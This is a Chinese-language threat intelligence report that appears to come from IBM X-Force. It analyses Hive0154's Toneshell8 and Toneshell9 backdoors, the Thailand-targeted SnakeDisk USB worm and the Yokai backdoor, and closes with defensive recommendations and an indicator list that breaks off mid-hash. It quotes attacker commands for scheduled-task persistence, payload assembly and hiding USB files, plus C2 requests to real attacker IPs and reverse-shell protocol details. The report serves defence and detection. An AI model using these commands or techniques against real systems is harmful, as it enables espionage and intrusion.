安全 计算和服务器

Hive0154（又名 Mustang Panda）投放更新版 Toneshell 后门与新型 SnakeDisk USB 蠕虫

笔记本电脑特写，屏幕显示蓝色代码，中部有一行红色代码

作者

Golo Mühr

Malware Reverse Engineer

IBM

Joshua Chung

Cyber Threat Intelligence Analyst

IBM Security

2025 年 7 月，IBM X-Force 发现了与中国关联的威胁组织 Hive0154 的新恶意软件。其中包括可规避检测并支持多项新功能的升级版 Toneshell 变种，以及8月中旬发现的新型 USB 蠕虫 SnakeDisk。该蠕虫仅在泰国 IP 地址的设备上执行，并会投放由 Netskope 于 2024 年 12 月发现的 Yokai 后门。

重要结论

  • 2025 年年中期间，IBM X-Force 观察到多个 Toneshell 和 Pubload 恶意软件变种，它们被植入恶意存档文件中，且这些文件主要来自新加坡和泰国地区的上传源。
  • 其中一个能规避 VirusTotal 检测的变种是最新升级版“Toneshell9”。它支持通过本地配置的代理进行命令与控制 (C2) 通信，以融入企业网络流量，同时可并行运行两个反向 shell。
  • X-Force 分析了一款新型 USB 蠕虫病毒 SnakeDisk，该病毒会基于设备的 IP 地址进行判断，仅在位于泰国的设备上执行。它与 Tonedisk 蠕虫存在代码重叠，且能够检测新连接及已存在的 USB 设备，并将这些设备武器化以作为传播载体。
  • 经分析的 SnakeDisk 样本会在受感染设备上安装 Yokai 后门，该后门会建立反向 shell，允许操作者执行任意命令。Yokai 此前曾与2024年12月针对泰国官员的攻击活动相关联。

背景

Hive0154 是一个成熟的威胁参与者，拥有庞大的恶意软件武器库、统一的攻击技术体系，且在过去数年中的活动轨迹具备充分的可追溯性。该组织由多个子集群构成，长期针对公共及私人组织发动网络攻击，攻击目标涵盖智库、政策研究机构、政府部门及个人。X-Force 观察到，该组织使用多种自定义恶意软件加载器、后门及 USB 蠕虫家族，充分彰显了其先进的恶意代码开发能力。Hive0154 的活动轨迹与公开报道的多个威胁参与者存在重叠，包括 Mustang Panda、Stately Taurus、Camaro Dragon、Twill Typhoon、Polaris 及 Earth Preta 等。

针对东亚地区的网络间谍活动

整个 2025 年年中，X-Force 观察到多个来自新加坡和泰国的武器化压缩包被上传至 VirusTotal：

文件名

恶意 DL

C2 服务器

日期

Meeting Venue Request Information.zip

加载器注入 Pubload shellcode

188.208.141[.]
196:443

5 月 21 日

Hotel Booking Request.7z

Toneshell8

146.70.29[.]
229:443

7 月 3 日

Cyber_Safety_
Checklist_
2025.rar

Toneshell8

146.70.29[.]
229:443

7 月 30 日

TNLA နှင့် အခြားတော်လှန်ရေးအင်အားစုများ.rar

（缅语译名：“TNLA 及其他革命武装力量”）

Toneshell8

146.70.29[.]
229:443

7 月 30 日

安全扫描 (08-02-205).zip

Toneshell8

146.70.29[.]
229:443

8 月 5 日

Notes.rar

加载器注入 Pubload shellcode

188.208.141[.]
196:443

8 月 21 日

CallNotes.zip

加载器注入 Toneshell7 shellcode

146.70.29[.]
229:443

9 月 4 日

据观察，Hive0154 组织正使用一款新加载器，通过反射注入方式加载 Pubload 或 Toneshell7 恶意软件，同时也会直接部署混淆程度更高的 Toneshell8 变种。最新版 Pubload 仅做了小幅改动，除保留原有的“伪装 TLS 流量的原始 TCP 通信”功能外，新增了诱饵 C2 服务器支持，且可通过 HTTP POST 方法下载壳代码载荷。

2025 年 9 月发现的归档文件“CallNotes.zip”，是通过一个伪装成缅甸外交部的 PDF 诱饵文档中的链接，从 Box 云存储平台下载获取的：

携带 Toneshell7 武器化压缩包下载链接的 PDF 文档
图 1：携带 Toneshell7 武器化压缩包下载链接的 PDF 文档

八月中旬，X-Force 还发现了与先前 Tonedisk 变种存在重叠的新型 USB 蠕虫 SnakeDisk。该蠕虫仅根据设备公网 IP 地址判断地理位置，确认位于泰国境内才执行。SnakeDisk 会投放 Yokai 后门——该后门由 Netskope 在 2024 年 12 月公开披露，与多起针对泰国的攻击活动存在关联。

鉴于 Yokai 后门此前就有针对泰国的攻击记录，此次新型 USB 蠕虫的发现似乎与泰国近期相关的地缘政治事件存在关联：

  • 2025 年 5 月下旬，泰国与柬埔寨发生边境冲突，导致一名柬埔寨士兵死亡。后续泰柬双方的谈判破裂，两国均沿边境地区增派了兵力
  • 2025 年 6 月，泰国总理贝东丹·西那瓦与柬埔寨前领导人洪森的通话记录遭泄露，导致泰国总理被免职。
  • 2025 年 7 月 24 日，泰柬边境爆发多次武装冲突，涉及炮击、空袭及海上轰炸。2025 年 7 月 28 日，在美国与马来西亚斡旋下，双方达成临时停火协议
  • 2025 年 8 月上旬，柬埔寨政府指控泰国军方策划刺杀柬埔寨总理（遭泰方否认），其情报来源称为“未具名外国情报机构”。

传统上，中华人民共和国（PRC）一直是柬埔寨的重要支持者，提供武器援助并投资数十亿美元用于基建项目。近期的地缘政治事件可能促使 Hive0154 针对泰国展开行动。SnakeDisk USB 蠕虫被配置为仅限泰国境内的设备执行，这似乎表明 Hive0154 正试图渗透政府网络中常用的物理隔离系统。

Toneshell8 更新（2025 年 3 月）

X-Force 于 2025 年 3 月首次发现 Toneshell 版本 8。该变种的行为与早期 7 版本高度相似，但包含小幅更新以规避静态检测并阻碍逆向分析。最显著的变化是在恶意软件的函数中嵌入了垃圾代码。这些垃圾代码段实现了以下行为：

  • 通过 API 调用写入随机临时文件后立即删除
  • 复制并循环字符串。初始样本所用字符串复制自 OpenAI 的 ChatGPT 网站
  • 随机间隔休眠

例如，这三个代码示例可在解析所有 API 的函数中找到：

随机休眠垃圾代码
图 2：随机休眠垃圾代码
展示垃圾代码中创建并删除随机文件的代码片段
图 3：垃圾代码中创建并删除的随机文件
展示垃圾代码中无意义字符串扫描的代码片段
图 4：无意义字符串扫描垃圾代码

Toneshell8 开发者还选用自定义线性同余生成器（LCG）替代伪随机数生成器（PRNG），例如采用不同常数的实现：

DWORD __cdecl zf_update_prng(main_struct *main_struct)
{
  main_struct->prng_state = 0xBD828 * main_struct->prng_state + 0x4373A;
  return main_struct->prng_state;
}

伪随机数生成器 (PRNG) 在 Toneshell 恶意软件中用于生成受害者 ID、C2 流量加密密钥，以及验证 C2 信标的真实性。Toneshell8 样本中 PRNG 的实现质量差异显著。例如上述生成器被前述 4 个样本采用，且对于大多数种子仅能产生 11 种不同的状态。

最后，发送至 C2 服务器的硬编码响应码（用于向操作者通知指令状态）现通过计算样本中不同的硬编码整数值进行混淆处理。

Toneshell9（2025 年 7 月）

2025 年 7 月，X-Force 发现代号为 Toneshell9 的新变种。该变种包含重大更新，截至撰写本文时在 VirusTotal 上仍无检测记录（318a1ebc0692d1d012d20d306d6634b196cc387b1f4bc38f97dd437f117c7e20）。

该变种首次出现于携带“USB Safely Remove”软件的恶意 RAR 压缩包。其代码结构似乎基于 2024 年 12 月的分叉变种，二者 C2 配置完全一致。

初始化

与早期变种类似，Toneshell9 以 DLL 侧载方式执行。该武器化 RAR 归档文件包含一个 BAT 文件，通过命令行参数“-Embedding”启动合法可执行程序“USBSRService.exe”。当 Toneshell 恶意 DLL“EasyFuncs.dll”被加载到内存，且导出函数 FS_RegActiveX 执行后，其首先解析初始化所需的第一组 API。在解析“-Embedding”命令行参数后，Toneshell 会以新进程形式启动其父进程可执行程序，并附带参数 “EvtSys”。该参数会触发恶意 DLL 的核心恶意行为。

Toneshell 首先初始化一个新的客户端对象，该对象包含以下值：

struct TONESHELL_CLIENT
{
  BYTE is_connected;
  HANDLE heartbeat_thread;
  C2_CLIENT *p_c2_client;
  DWORD unused_C;
  VICTIM_DATA *p_victim_data;
  DWORD unused_14;
  QWORD tick_count;
};

然后，它通过自定义哈希函数解析其余必要的 API，并将函数指针存储在单独的结构体中。接下来，它会创建一个新事件“Windows External Module”，充当互斥锁，以防止在同一台机器上运行多个实例。

Toneshell9 中充斥着多段垃圾代码，这些代码会获取当前 CPU 时钟周期数，将结果存储为字符串后又立即释放该字符串。

Toneshell9 在 API 解析逻辑中嵌入的代码片段
图 5：API 解析逻辑中的 Toneshell9 垃圾代码

为在内存中管理和存储 C2 通信数据、代理服务器配置、信标信息及载荷，Toneshell 会实例化一个大小为 129KB 的大型对象：

struct C2_CLIENT
{
  std::vector<std::string> c2_list;
  SOCKADDR_IN c2_sockaddr_array[16];
  int current_c2_sockaddr_index;
  int number_of_c2s;
  BYTE key[768];
  SOCKET ptr_socket;
  DWORD beacon_tls_header;
  BYTE beacon_payload_buffer[65536];
  BYTE c2_response_buffer[65536];
  DWORD size_of_c2_response;
  BYTE critical_section[24];
  std::list<proxy_entry> proxy_list;
  int proxy_enabled;
  int current_c2_string_index;
};

与早期变种不同，Toneshell9 会枚举 HKEY_LOCAL_MACHINE、HKEY_CURRENT_USER 及 HKEY_USERS\.DEFAULT 三个注册表 hive，以搜索本地配置的代理服务器。

展示 Toneshell9 从 Windows 注册表解析代理服务器的代码片段
图 6：Toneshell9 从 Windows 注册表解析代理服务器

若检测到代理服务器，则将 URL 协议类型（http, https, ftp, or socks）及完整 URL 以字符串形式存入对象列表。

接着 Toneshell 将 C2 服务器域名与 IP 地址存入字符串向量，同时把相同的硬编码 IP 与端口直接存入 SOCKADDR_IN 结构数组。随后遍历 C2 服务器字符串，解析每个地址的 IP 并添加入同一 SOCKADDR_IN 结构数组。

展示 Toneshell 解析并存储 C2 服务器地址的代码片段
图 7：Toneshell 解析并存储 C2 服务器地址

与先前变种类似，Toneshell 会生成包含 16 字节随机受害者 GUID 的文件（通过 Windows _rand() 函数生成）：

C:\ProgramData\ProgrammaticallyCpp.inc

该 GUID 与文件路径及受害者 NetBIOS 名称共同存储于结构体中。

struct VICTIM_DATA
{
  BYTE victim_guid[16];
  BYTE computername[24];
  BYTE guid_path[24];
};

上述数据用于在内存中构造一个信标对象。值得注意的是，Toneshell9 会计算上述主要初始化行为前后的 CPU 时钟计数差值。该值经过标准化处理，可能用于检测执行时间异常（如延迟沙箱执行或调试行为）。

struct BEACON_DATA
{
  BYTE key[768];   
  BYTE code_byte;       // set to 0x02
  BYTE victim_guid[16];
  BYTE computername[80];
  DWORD tick_delta;
};

通过 _rand() 生成 0x300 字节的 XOR 密钥，用于加密从偏移量 0x300 起始的 101 字节数据。随后将数据封装为仿冒的 TLS 1.2 应用数据包，格式如下：

struct BEACON
{
  BYTE tls_header[3];       // 17 03 03
  WORD payload_size;        // 0x0365 (big-endian)
  BYTE payload_data[869];  
};

C2 通信和 HTTP 代理

在主循环中，Toneshell9 执行函数尝试连接 C2 服务器：首先尝试通过首个 SOCKADDR_IN 结构建立连接。如果失败，恶意软件会尝试通过从注册表收集的代理服务器建立套接字连接。此过程针对所有 C2 地址字符串（包括 IP 地址与域名）逐一尝试。

在解析代理服务器的地址并通过 TCP 套接字连接后，首先将发送和接收超时时间设置为 1 分钟。接下来，它发送以下连接请求：

CONNECT <C2 server>:<C2 port> HTTP/1.0
Host: <C2 server>:<C2 port>
Content-Length: 0
Proxy-Connection: Keep-Alive
Pragma: no-cache

如果代理服务器返回 2xx 状态码，表示连接已成功建立，准备进行原始TCP 隧道通信。为验证与 C2 服务器的连接，Toneshell9 采用简短的握手协议，并在过程中传输服务器 IP 与端口信息。若握手成功，套接字句柄将存入 C2_CONNECTION 结构体，同时套接字超时时间设置为 2 分钟。随后 Toneshell 通过该套接字发送首个通信信标。

该恶意软件期望从其 C2 服务器接收格式相似的响应数据，除前 5 字节外，其余数据均通过此前传输的异或密钥进行加密：

struct C2_RESPONSE
{
    BYTE tls_header[3];     // 17 03 03
    WORD payload_size;      // big-endian
    BYTE command_code;
    BYTE shell_id;
    BYTE data[];
}

Toneshell 借助受感染设备上已配置的代理服务器，可有效融入其他网络流量中。大型企业环境通常会部署出站过滤机制，仅允许流量通过可信网关传输，这会阻断直接的 C2 通信。而 Toneshell 新增的这一过滤规避能力，使其能够在安全防护严密的网络环境中正常运作。

反向 shell

收到首次 C2 响应后，Toneshell 会启动新线程，每 30 秒发送一次类似心跳的响应信标（包含 0x1 响应码与随机 shell_id 值）。响应信标的格式极为相似：

struct BEACON_CMD_RESPONSE
{
    BYTE tls_header[3];     // 17 03 03
    WORD payload_size;      // big-endian
    BYTE response_code;
    BYTE shell_id;
    BYTE data[];
}

Toneshell9 支持以下指令码：

代码

说明

2

跳过当前信标，等待处理下一个

3

创建新反向 shell 并分配至 shell_id

4

将命令字符串写入由 shell_id 标识的反向 shell

5

关闭由 shell_id 标识的反向 shell

与先前变种类似，反向 shell 通过连接新 cmd.exe 进程 stdin/stdout 句柄的匿名管道建立。Toneshell9 支持同时运行两个活跃反向 shell，并使用以下结构管理 shell 连接：

struct REVERSE_SHELL
{
  int shell_id;
  BYTE cmd_path[24];
  HANDLE hReadPipe1;
  HANDLE hWritePipe1;
  HANDLE hReadPipe2;
  HANDLE hWritePipe2;
  DWORD hThread_cmd;
  DWORD hProcess_cmd;
  DWORD parent_pid;
  BYTE cmd_process_created;
  DWORD hThread_pipe_to_c2;
};

每个反向 shell 都会创建独立线程，定期检查 stdout 管道的新数据，并通过响应码为 0x4 的信标将数据回传至 C2 服务器。Toneshell 操作者可通过正确的 shell_id 向管道写入字符串数据，从而在受感染机器上执行任意命令。当关闭反向 shell 时，系统上由 parent_pid 标识的 conhost.exe 进程也会被终止。

SnakeDisk USB 蠕虫

2025 年 8 月，X-Force 发现一款此前未知的 USB 蠕虫，并将其归因于 Hive0154 组织。这个 32 位 DLL 文件以 "01.dat" 为名从泰国上传至 VirusTotal，其特性与 Toneshell9 高度相似：两者均通过 DLL 侧加载执行，除 DllEntryPoint 和恶意软件入口点外，所有导出函数都指向同一立即返回的例程；同时它们还具备几乎完全相同的 API 解析机制，这与绝大多数 Toneshell 相关恶意软件的特征一致。与 Toneshell9 样本类似，SnakeDisk 也会读取命令行参数以选择两种执行路径之一：

  • "-Embedding"：先启动 USB 感染行为，在设备被移除时投放并执行内嵌载荷。
  • "-hope"：立即投放并执行内嵌载荷。

初始化

为执行 USB 感染功能，SnakeDisk 蠕虫需要一个配置文件，并会在其父进程可执行程序的当前目录中搜索该文件。该目录下找到的所有文件（命名为“System Volume Information”的文件除外）都会被加入潜在配置文件列表。随后，SnakeDisk 会打开并读取每个文件，在执行解密操作前，通过验证以下条件来确认文件的有效性。

  • 文件大小介于 0x14A 至 0x14000 字节之间
  • 前 4 字节为文件其余部分的正确 CRC32 哈希值

SnakeDisk 随后采用疑似自定义的双阶段 XOR 算法配合 330 字节头部中存储的 320 字节密钥对数据进行解密。

展示基于 XOR 的配置解密算法代码片段
图 8：基于 XOR 的配置解密算法

最终，恶意软件会解析定义其行为的 18 个字符串配置值。虽然 X-Force 未能获取配置文件，但通过对 SnakeDisk 的分析可推断以下字段的潜在用途：

配置字段

用途

版本

恶意软件版本信息，用于判断已感染的客户端是否需要重新感染更新后的变种。

mutx

互斥体字符串。

psd

在当前分析的样本中未使用。可能是 "usd" 的本地等效字段——所有以 "u*" 开头的值均代表武器化后 USB 设备上的文件或目录名称。

urd

疑似 "USB 根目录"。在 USB 设备上创建的、用于容纳子目录的目录名称。

uud

疑似 "USB 用户目录"。位于<urd>之下的目录名称，用于存放来自 USB 设备的用户原始文件。

usd

疑似 "USB 暂存目录"。位于<urd> 下的目录名称，用于存储 SnakeDisk 的各种恶意组件。

pnex

疑似 "父进程可执行文件名"。SnakeDisk 执行时，其当前目录中存在的文件名称。

pndl

疑似 "父进程 DLL 文件名"。SnakeDisk 执行时，其当前目录中存在的文件名称。

pnen

疑似 "父进程加密文件名"。SnakeDisk 执行时，其当前目录中存在的文件名称。

pnendl

可能是“经加密的父进程名称相关 DLL”。SnakeDisk 执行期间其当前目录中存在的某个文件的文件名。

unex

可能是“USB 设备名称关联的可执行文件”。从 <pnex> 复制到 USB 设备的文件的文件名。

undl

疑似 "USB DLL 文件名"。从<pndl>复制到 USB 设备的文件名称。

unen

疑似 "USB 加密文件名"。从 <pnen> 复制到 USB 设备的文件名称。

unendl

可能“USB 名称加密 DLL”。从 <pnendl> 复制到 USB 设备的文件的文件名。

unendl_org

从 <pnendl> 复制到 USB 设备根目录、并通过文件属性隐藏的（疑似 DLL 格式）文件的文件名

unconf

投放至 USB 设备的 SnakeDisk 配置文件的文件名称。

regkey

可能关联注册表持久化机制。在当前分析的样本中未使用。

schkey

可能关联计划任务持久化机制。在当前分析的样本中未使用。

成功读取配置文件后，SnakeDisk 会尝试确认当前是否在泰国境内的机器上执行。它向 http://ipinfo[.]io/json 发送 HTTP GET 请求，并检查返回的 "country" 字段是否匹配 "THA" 或 "TH"。若条件满足，恶意软件将继续执行。

GET /json HTTP/1.1
Connection: Keep-Alive
User-Agent: Program/1.0
Host: ipinfo.io

值得注意的是，即使在解析 API 或进行网络通信时发生错误，程序仍会继续运行。

随后，SnakeDisk 尝试打开名为 "Global\\" 的互斥锁来确保仅运行单个实例。若该互斥锁已存在，恶意软件将退出；否则，它会通过 CreateMutexW 函数创建互斥锁。

USB 设备检测

为感染所有已连接的 USB 驱动器，SnakeDisk 开始遍历从 A 到 Z 的所有可能盘符。它会打开物理卷的句柄（例如 "\\.\A:"），并向设备发送 IO 控制码 IOCTL_STORAGE_GET_HOTPLUG_INFO (0x2D0C14)。如果根据返回的 STORAGE_HOTPLUG_INFO 结构判断该设备为热插拔设备，它将启动新线程感染该驱动器。

遍历所有盘符后，SnakeDisk 休眠 5 秒，随后注册名为 "TestClassName" 的新窗口类并创建对应的 "TestWindowName" 窗口。为接收来自操作系统的消息，该函数通过 GetMessageW 创建 Windows 消息循环，并经由 TranslateMessage DispatchMessageW 将消息分派至恶意软件的窗口处理程序。仅当收到 WM_CAP_PAL_OPEN (0x450) 消息时，该循环才会退出。恶意窗口类引用了一个自定义过程，用于监听 WM_DEVICECHANGE (0x219) 消息，特别是 DBT_DEVICEARRIVAL (0x8000) 和 DBT_DEVICEREMOVECOMPLETE (0x8004) 事件。

监听 WM_DEVICECHANGE 消息的窗口类回调函数代码片段
图 9：监听 WM_DEVICECHANGE 消息的窗口类回调函数

若接收到此类消息（例如，当 USB 设备插入受感染机器时），该函数会利用 DEV_BROADCAST_VOLUME 结构体的 dbcv_unitmask 字段确定对应设备的驱动器号。对于新连接的设备，SnakeDisk 会启动新线程对该驱动器进行感染。若检测到设备被移除，SnakeDisk 会启动线程释放并执行内置载荷，该载荷的执行流程与 SnakeDisk DLL 通过命令行参数“-hope”启动时的执行路径完全一致。

USB 传播

用于感染已检测到的 USB 设备的线程，首先会在该驱动器中搜索已存在的配置文件，以判断其是否已被感染。该线程会尝试对所有扩展名为 .dat 或 .cd 的文件进行解密和配置解析。若解析成功，恶意软件会将已感染驱动器中的 SnakeDisk 版本号与其自身配置中的版本号进行比对，仅对安装了旧版本 SnakeDisk 的驱动器执行重新感染操作。

接着，SnakeDisk 启动另一个线程，将 USB 上的现有文件移至新的子目录中。通过隐藏用户原本期望在 USB 中看到的文件，恶意软件增加了受害者误以为 USB 尚未被打开，从而在另一台机器上意外点击与设备同名的武器化可执行文件的可能性。执行后，恶意启动器会重新复制用户文件以避免引起怀疑。受感染设备上存放用户数据的路径根据配置值构建如下：

<drive_letter>:\<urd>\<uud>\

该恶意软件可能采用两种不同的机制执行此操作，每种机制均在独立线程中启动。第一种机制通过 SHFileOperationW 函数移动各类文件，且在每次操作过程中，会从文件“C:\Windows\Tmp\msd.log”读取 32 字节数据，将其写入文件“C:\ProgramData\app.log”后随即删除该日志文件。此行为的具体目的目前尚不明确。

展示威胁参与者将文件从 USB 设备移动至新目录的代码片段
图 10：将 USB 中的文件移至新目录

在该线程运行期间，恶意软件会定期检查任务是否在 30 秒内成功完成，随后启动第二个线程。第二个线程使用 robocopy 移动文件，并在新进程中执行以下命令：

robocopy <drive_letter>:\ <drive_letter>:\<urd>\<uud>\ /XD
"<drive_letter>:\<urd>\" /XF "<drive_letter>:\<unendl_org>" /XF
"<drive_letter>:\<usb_volumename>.exe" /XD "System Volume Information" /E
/MOVE

两次文件移动操作均排除了 SnakeDisk 的武器化文件及应保留在 USB 磁盘根目录的 "System Volume Information" 文件。运行上述命令后，会再次执行相同命令并附加两个参数 /IS 和 /XO，以包含相同文件并排除比目标目录更旧的源目录文件。

移动 USB 上的现有文件后，SnakeDisk 开始从其当前目录向 USB 驱动器复制自身载荷。根据配置指定的以下文件将通过 CopyFileW 进行复制（每个文件在新线程中处理）：

.\<pnex> copied to <drive_letter>:\<urd>\<usd>\<unex>
.\<pndl> copied to <drive_letter>:\<urd>\<usd>\<undl>
.\<pnen> copied to <drive_letter>:\<urd>\<usd>\<unen>
.\<pnendl> copied to <drive_letter>:\<urd>\<usd>\<unendl>
.\<pnen> copied to <drive_letter>:\<usb_volumename>.exe
.\<pnendl> copied to <drive_letter>:\<unendl_org>

USB 驱动器根目录下该 EXE 文件的文件名会被设置为 USB 设备的卷标名称；若卷标为空，则直接命名为“USB.exe”。SnakeDisk 还会为复制到路径“< 驱动器号 >:”的文件设置“系统”和“隐藏”属性。且 USB 设备上的所有目录也会被赋予这些属性，这使得除该可执行文件外，其余所有内容均被有效隐藏。尽管 X-Force 未获取到其他文件，但此前的 USB 蠕虫曾使用相同手法诱导受害者点击该可执行文件，进而通过 DLL 侧载触发感染流程。该恶意 DLL 的文件名很可能存储在配置项“unendl_org”中。最后，SnakeDisk 会将自身配置写入 USB 设备上一个新文件，文件名取自配置项“unconf”的值。

载荷执行

当检测到 USB 设备移除时，或通过 "-hope" 命令行参数在 SnakeDisk 执行开始时，负责投放并执行内嵌载荷的 SnakeDisk 线程将被启动。

该线程首先读取其所在目录下的标记文件“vm.ini”，并将文件内容与自身当前路径进行比对。此文件会在载荷成功释放并执行后写入系统，用于标记受害者设备是否已感染 SnakeDisk 的内置载荷。如果路径匹配，则不会丢弃任何载荷，并且线程将终止。

完成首次检查后，SnakeDisk 开始向 "C:\Users\Public\" 目录投放一系列载荷。每个文件均在内存中通过大小介于 0.6 至 3.3 MB 的大型函数内的立即数值构建而成。

展示构造二进制载荷的反汇编函数代码
图 11：构造二进制载荷的反汇编函数

随后通过简单的 XOR 运算对载荷进行解密，再将其作为文件投放到以下路径：

  • C:\Users\Public\srv0
  • C:\Users\Public\srv1
  • C:\Users\Public\srv2
  • C:\Users\Public\loga
  • C:\Users\Public\logb
  • C:\Users\Public\logc

这些文件会以三个为一组进行拼接，通过以下命令生成两个最终载荷：

cmd.exe /c cd "c:\users\public\" & copy /b "srv0"+"srv1"+"srv2"
c:\users\public\libcef.dll
cmd.exe /c cd "c:\users\public\" & copy /b "loga"+"logb"+"logc"
c:\users\public\<randomised_name>.exe

该可执行文件的文件名由 10 个随机大写字母与数字组成。文件拼接完成后，原始文件将被删除。

最终，可执行文件会在新进程中启动，并附带硬编码的命令行参数：

c:\users\public\<randomised_name>.exe -project-mod

不出所料，此可执行文件（哈希值 bb5bb82e5caf7d4dbbe878b75b23f793a5f3c5ca6dba70d8be447e8c004d26ce）是合法且经过签名的 acwebbrowser.exe，它会在执行过程中通过 DLL 侧加载技术加载恶意的 libcef.dll

Yokai 后门

其中该 DLL 载荷被识别为 Yokai 后门，该后门已于 2024 年 12 月由 Netskope 披露。该恶意软件执行后，首先会检查是否存在命令行参数“-project-mod”；若当前用户并非管理员组成员，则会通过计划任务建立持久化机制：

cmd.exe /c schtasks /create /f /sc MINUTE /MO 5 /tn
"MicrosoftEdgeAcModuleUpdateTask" /tr "<path> -project-mod"

随后，后门会创建名为 "k1tpddvivh74fo1et725okr1c1" 的新互斥锁，并初始化内部配置结构。SnakeDisk 投放的此变种包含版本字符串 "1.0.0"，并通过 HTTP POST 请求联系硬编码的 C2 服务器：

POST /kptinfo/import/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHTTP Example/1.0
API-INDEX: 0
Accept-Connect: 0
Content-Length: 156
Host: 118.174.183[.]89
<encrypted data>

正如 Netskope 的分析报告所述，Yokai 后门通过匿名管道创建反向 shell，使攻击者能够在受感染机器上执行任意命令。

值得注意的是，Yokai 后门与归因于 Hive0154 的其他后门家族（如 Pubload/Pubshell 和 Toneshell）存在重叠特征。尽管这些家族显然是独立的恶意软件，但它们大致遵循相同的结构，并使用类似的技术与 C2 服务器建立反向 shell。

与 Tonedisk 的重叠

X-Force 的分析还发现，SnakeDisk 与 Tonedisk 之间存在高度关联性。多年来，已发现多个与威胁组织 Hive0154 相关联的 USB 蠕虫家族。其中在实现逻辑上与 Toneshell 家族高度相关的变种被 X-Force 归类为 Tonedisk。截至目前，已识别出 3 个主要的 Tonedisk 版本（A、B、C）。每个版本均由一组不同的恶意组件构成，共同实现 USB 蠕虫的完整功能。这些组件包括启动器、加载器、传播器、加密文件、安装程序和后门。

SnakeDisk 尤其与 ToneDisk A 变种存在重叠，该变种曾于 2023 年年中被 Checkpoint 以 WispRider 之名报告。两款恶意软件的 USB 传播机制、API 哈希算法及配置文件均显示出多处相似性，这符合 Hive0154 子集群内部已知的共享与复用恶意代码的倾向。

归属声明

X-Force 将本报告所述活动归入 Hive0154 总集群进行追踪，该集群与已公开的 Mustang Panda、Stately Taurus、Camaro Dragon、Twill Typhoon、Polaris、TEMP.Hex 及 Earth Preta 等活动存在部分重叠。该组织似乎维持着一个相当庞大的恶意软件生态体系，在恶意代码、攻击技术及目标选择上频繁出现重叠。在这个总集群内，X-Force 以较低置信度区分出至少三个子活动集群，每个集群分别与核心恶意软件系列 PlugX、Toneshell 和 Pubload 相关联。值得注意的是，每个恶意软件系列都搭配了不同的 USB 蠕虫框架以及一个或多个相关的加载器变种（这些加载器变种更迭更为频繁）。同一加载器可能在相同时期内用于投放不同载荷（如 Toneshell 或 Pubload）。但需重点指出，活动集群的划分并不自动意味着它们作为独立子群组运作。

与 SnakeDisk 及 Yokai 后门相关的活动可能指向 Hive0154 的又一个子集群。当前迹象表明其主要针对泰国，这从 SnakeDisk 中的 IP 地理定位检查及 Netskope 的报告中可见一斑。

总结

Hive0154 仍是一个能力高超的威胁行为者，拥有多个活跃子集群及频繁的开发周期。X-Force 以高度置信度评估，与中国相关的组织如 Hive0154 将继续完善其庞大的恶意软件武器库，并瞄准全球的公共及私营机构。本报告讨论的恶意软件可能仍处于早期开发阶段，这使防御方有机会在其广泛使用前部署检测机制。面临 Hive0154 间谍活动风险的实体应保持高度防御状态，对本报告提及的技术保持警惕，并参考以下建议：

  • 谨慎处理包含 Google Drive、Box 云存储或 Dropbox 下载链接的电子邮件或 PDF 文件
  • 谨慎处理下载的压缩文件，即使其中确实包含预期文档培训员工显示并识别异常文件扩展名
  • 在网络中监控并狩猎无前置 TLS 握手的 TLS 1.2 应用数据报文（头部标识：17 03 03），此类报文可作为 Pubload 或 Toneshell 恶意软件信标的检测特征
  • 监控并狩猎包含可疑可执行文件名、DLL 文件及隐藏目录的 USB 设备，此类特征可作为判断设备是否感染 USB 蠕虫的依据
  • 监控并排查 C:\ProgramData\ 中可疑及未知的目录，这些目录通常包含易受 DLL 侧加载攻击的合法 EXE 文件及其对应的恶意 DLL
  • 监控并排查注册表及计划任务中的持久化技术
  • 搜寻本报告中详述的进程、网络流量及入侵指标
  • 监控源自看似良性的可执行进程（这些进程会侧加载恶意 DLL）的任何异常网络活动、持久化行为或文件修改行为

入侵痕迹指标

指示符

指标类型

情境化

f8b28cae687bd55a148d363d58f1
3a797486f12221f0e0d080ffb53611
d54231

SHA256

用于投递 Toneshell8 恶意软件的武器化压缩包

8132beeb25ce7baed0b561922d26
4b2a9852957df7b6a3daacfbb3a9
69485c79

SHA256

用于投递 Toneshell8 恶意软件的武器化压缩包

d1466dca25e28f0b7fae71d5c2abc0
7b397037a9e674f38602690e96cc5
b2bd4

SHA256

用于投递 Toneshell8 恶意软件的武器化压缩包

1272a0853651069ed4dc505007e85
25f99e1454f9e033bcc2e58d60fdaf
a4f02

SHA256

用于投递 Toneshell8 恶意软件的武器化压缩包

b8c31b8d8af9e6eae15f30019e39c
52b1a53aa1c8b0c93c8d075254ed
10d8dfc 

SHA256

用于投递 Toneshell7 恶意软件的武器化压缩包

7087e84f69c47910fd39c3869a70
6e55324783af8d03465a9e7bfde
52fe4d1d6 

SHA256

用于投递 Pubload 恶意软件的武器化压缩包

38fcd10100f1bfd75f8dc0883b0c
2cb48321ef1c57906798a422f2a2
de17d50c 

SHA256

用于投递 Pubload 恶意软件的武器化压缩包

69cb87b2d8ee50f46dae791b5a0
c5735a7554cc3c21bb1d989baa0f3
8c45085c

SHA256

携带武器化压缩包下载链接的 PDF

564a03763879aaed4da8a8c1d60
67f4112d8e13bb46c2f80e0fcb9ffd
d40384c

SHA256

注入 Toneshell7 的加载器

e4bb60d899699fd84126f9fa0df
f72314610c56fffca3d11f3b6fc93fc
b75e00 

SHA256

注入 Pubload 的加载器

c2d1ff85e9bb8feb14fd015dceee1
66c2e52e2226c07e23acc348815
c0eb4608 

SHA256

注入 Pubload 的加载器

188.208.141[.]196

IPv4

Pubload C2 服务器

bdbc936ddc9234385317c4ee83
bda087e389235c4a182736fc597
565042f7644

SHA256

ToneShell8 后门

f0fec3b271b83e23ed7965198f3b
00eece45bd836bf10c038e99106
75bafefb1

SHA256

ToneShell8 后门

e7b29611c789a6225aebbc9fee37
10a57b51537693cb2ec16e2177c22
392b546

SHA256

ToneShell8 后门

9ca5b2cbc3677a5967c448d9d21
eb56956898ccd08c06b372c6471f
b68d37d7d

SHA256

ToneShell8 后门

146.70.29[.]229

IPv4

Toneshell7/Toneshell8 C2 服务器

318a1ebc0692d1d012d20d306
d6634b196cc387b1f4bc38f97d
d437f117c7e20

SHA256

ToneShell9 后门

0d632a8f6dd69566ad98db56
e53c8f16286a59ea2bea81c2761
d43b6ab4ecafd

SHA256

投放 Toneshell9 的武器化压缩包

39e7bbcceddd16f6c4f2fc2335a
50c534e182669cb5fa90cbe29e
49ec6dfd0df

SHA256

投放 Toneshell9 的武器化压缩包

05eb6a06b404b6340960d7a6
